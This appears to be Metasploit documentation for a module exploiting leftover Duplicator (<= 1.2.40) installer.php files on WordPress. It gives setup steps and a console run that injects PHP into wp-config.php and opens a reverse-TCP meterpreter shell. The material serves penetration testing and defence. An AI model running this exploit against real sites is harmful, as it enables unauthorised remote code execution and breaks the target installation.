Duplicator by Snap Creek is a WordPress plugin that can be used to create a complete backup of a WordPress instance and restore it on a fresh server. The export method generates 2 files: * An ZIP archive with the complete WordPress files and Duplicator specific files: * A copy of the `installer.php` script: `installer-backup.php` * A SQL script that will be used to restore the database content: `database.sql` * An installer PHP script to restore the archive `installer.php` When the `installer.php` completes its process, the following files remain in the directory and has to be manually deleted: * The ZIP archive * `database.sql` * `installer-backup.php` * `installer-data.sql` * `installer-log.txt` * `installer.php` WARNING: exploiting the vulnerability will overwrite the wp-config.php file, breaking the WordPress instance. ## Vulnerable application Install a vulnerable version of [WordPress Duplicator (<= 1.2.40)](https://downloads.wordpress.org/plugin/duplicator.1.2.40.zip) and create a backup. Put the `install.php` and archive files on a clean web server. ## Verification Steps Confirm that functionality works: 1. Start `msfconsole` 2. `use exploit/multi/php/wordpress_duplicator` 3. Set the `RHOST`. 4. Confirm the target is vulnerable: `check` 5. Confirm that the target is vulnerable: `The target is vulnerable.` 6. Set a payload: `set PAYLOAD php/meterpreter/reverse_tcp` 7. Set `LHOST` and `LPORT` 8. Run the exploit: `run` 9. Confirm you have now a meterpreter session ## Options **TARGETURI** The path to the installer.php file to exploit By default, the path is `/installer.php`. ## Scenarios ### Debian 9 running WordPress 4.9.8 with Duplicator 1.2.40 ``` msf5 > use exploit/multi/php/wordpress_duplicator msf5 exploit(multi/php/wordpress_duplicator) > set RHOSTS 1.1.1.1 RHOSTS => 192.168.56.101 msf5 exploit(multi/php/wordpress_duplicator) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 msf5 exploit(multi/php/wordpress_duplicator) > set TARGETURI /installer_vuln.php TARGETURI => /installer_vuln.php msf5 exploit(multi/php/wordpress_duplicator) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Checking if the wp-config.php file already exists... [*] This WordPress was not restored. Creating the wp-config.php file... [*] Successfully created the wp-config.php file! [*] All good! Injecting PHP code in the wp-config.php file... [*] Requesting wp-config.php to execute the payload... [*] Sending stage (37775 bytes) to 1.1.1.1 meterpreter > sysinfo Computer : debian OS : Linux debian 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 Meterpreter : php/linux ```